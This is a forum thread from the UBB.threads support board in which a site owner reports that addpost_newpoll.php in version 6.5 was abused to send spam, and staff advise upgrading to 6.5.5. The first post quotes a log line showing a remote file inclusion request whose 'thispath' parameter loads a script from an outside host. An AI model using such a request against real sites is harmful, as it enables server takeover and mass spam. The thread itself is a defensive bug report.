You are not logged in. [Log In] UBB.threads PHP Forum Software Community » Forums » UBB.threads 6.x Discussion » Bug Reports » extreme security bug used to send ou 100.000s of spam emails
Register User    Portal Page     Forum List        Calendar     Active Topics     Search     FAQ
Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
UBBDev.com
UBBWiki.com
Who's Online
9 registered (mcasado, Mike L, Gizmo, SD, Bjab, driv, SteveS, nims2, Ruben), 23 Guests and 14 Spiders online.
Key: Admin, Global Mod, Mod
Featured Member
Registered: 04/22/10
Posts: 5
Top Posters (30 Days)
Ruben 63
SD 54
Gizmo 48
gliderdad 33
Dunny 21
driv 18
Iann128 16
dbremer 16
Stan 15
Mark S 13
Latest Photos
Testing
Basildon Train Station
Basildon Town Centre looking from the rounderbout
Basildon Town Square
Gizzo Marx
Topic Options
#194771 - 08/21/07 04:34 AM extreme security bug used to send ou 100.000s of spam emails
wnedoe Offline
stranger 		Registered: 08/21/07
Posts: 1
I use version 6.5

My provider informed me that the UBBT script addpost_newpoll.php
was used to send ou more than 100.000 spam emails and nearly cancelled my contract.

It seems that this is a well known bug at least to spammers as they had even programmed a complete USER INTERFACE for sending spam with UBBt and so probably millions of spam emails are sent out each day with he help of ubbt.

The way this script is/was abused

/forum//addpost_newpoll.php?addpoll=preview&thispath=http://geocities.com/uza_mere/uza.txt? HTTP/1.1" 200

(the abuse script has gone at this place but is probably to be found at a lot of places elsewhere
Top
#194772 - 08/21/07 05:19 AM Re: extreme security bug used to send ou 100.000s of spam emails [Re: wnedoe]
Gizmo Online cat

Registered: 06/05/06
Posts: 14904
Loc: Portland, OR; USA
Are you running 6.5? If so, security issues are well known in builds prior to 6.5.5, you should consider upgrading.
_________________________
Forums: UGN Security & VNC Web Design & Development
UBB.Threads: UBB.Wiki, My UBBSkins, UBB.Sitemaps
Longtime UBB Supporter, UBB Beta Tester & Resident Post-A-Holic.
UBB Modifications, Styling, Coding Services, Disaster Recovery, and more!
Top
#194779 - 08/21/07 10:55 AM Re: extreme security bug used to send ou 100.000s of spam emails [Re: Gizmo]
Rick Offline
Post-a-holic 		Registered: 06/04/06
Posts: 10164
Loc: Aberdeen, WA
Yes, we sent out an email to all of our customers when we were made aware of this and had a patch out to fix it. You should definitely at least upgrade to 6.5.5 at the minimum.
Top



Shout Box

Today's Birthdays
No Birthdays
Recent Topics
Edit Post
by Bert
Today at 01:19 PM
A positive note
by SteveS
Yesterday at 09:36 PM
How to locate links to particular site if they are only used in images?
by Conrad
02/10/12 09:41 PM
Pictures not displaying
by Marker23
02/09/12 10:04 PM
Issue with logging out constantly
by Flanuva
02/09/12 07:05 PM
Forum Stats
10213 Members
36 Forums
33667 Topics
180917 Posts

Max Online: 978 @ 06/24/07 11:19 PM
Random Image
Board Rules · Mark all read
Contact Us · UBBCentral · Top